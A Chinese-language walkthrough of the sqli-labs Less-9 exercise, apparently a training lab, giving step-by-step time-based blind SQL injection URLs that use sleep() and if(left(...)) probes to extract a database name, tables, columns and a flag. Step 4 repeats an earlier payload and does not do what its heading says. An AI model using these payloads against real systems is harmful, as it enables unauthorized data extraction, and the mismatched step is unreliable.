Less-9

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

1.判断是否存在注入

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1'

正确回显

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1"

正确回显

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+

延迟回显 => 存在注入

2.判断参数类型

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1 and sleep(3) --+

正常回显

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+

延迟回显 => 字符型注入

3.进行参数闭合

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+

延迟回显 => 闭合成功

4.猜解库的长度

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+

5.猜解库名

 https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+

6.猜解表名

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+

 7.猜解字段名

https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+

 8.猜解数据

?id=1' and if(left((select flag from paNrhmRA limit 0,1),1)='d',sleep(3),1) --+